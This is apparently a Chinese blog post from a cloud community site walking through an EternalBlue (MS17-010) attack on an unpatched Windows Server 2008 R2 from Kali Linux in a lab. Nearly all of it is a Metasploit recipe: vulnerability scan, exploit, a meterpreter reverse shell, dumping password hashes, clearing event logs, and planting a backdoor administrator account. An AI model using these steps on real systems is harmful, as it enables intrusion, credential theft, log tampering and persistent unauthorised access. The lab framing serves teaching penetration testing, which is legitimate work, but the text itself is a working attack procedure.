前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用MS17_010(永恒之蓝)漏洞攻击windows系统

利用MS17_010(永恒之蓝)漏洞攻击windows系统

作者头像
用户7162790
发布2022-03-23 14:30:56
1.4K0
发布2022-03-23 14:30:56
举报
文章被收录于专栏:森屿暖树

实验环境

攻击机 Kali Linux:192.168.48.128 靶机 Windows Server 2008 R2 x64:192.168.48.129

靶机需关闭防火墙并且没打永恒之蓝补丁

攻击过程

获取靶机和攻击机的IP地址

win2008

命令:ipconfig

kali

命令:ifconfig

利用MS17_010漏洞

验证漏洞是否存在

1.启用msfconsole

命令:msfconsole

2.搜索漏洞模块

命令:search ms17_010

3.利用验证模块

命令:use auxiliary/scanner/smb/smb_ms17_010

4.配置验证模块

命令:options/show options

对yes的进行配置

yes(必须配置),no(不一定要配置)

命令:set rhost 192.168.48.129

5.进行验证靶机

命令:run

进行渗透攻击

输入back命令返回msf5命令行

1.利用攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue

2.配置攻击模块

命令:options

命令:set rhost 192.168.48.129

3.发起攻击

命令:run

4.尝试获取在攻击机上获取靶机ip地址

植入后门

输入back命令返回

1.使用meterpreter模块

代码语言:javascript
复制
set payload windows/x64/meterpreter/reverse_tcp
run

2.模块使用 查看靶机系统信息:sysinfo 获得靶机用户密码:hashdump 捕捉靶机屏幕:screenhot 清除靶机日志:clearev

3.shell 命令:shell 创建windows用户 命令:net user hacker hacker123456 /add 将创建的用户加入到管理员组 命令:net localgroup administrators hacker /add

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 实验环境
  • 攻击过程
    • 验证漏洞是否存在
      • 进行渗透攻击
        • 植入后门
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档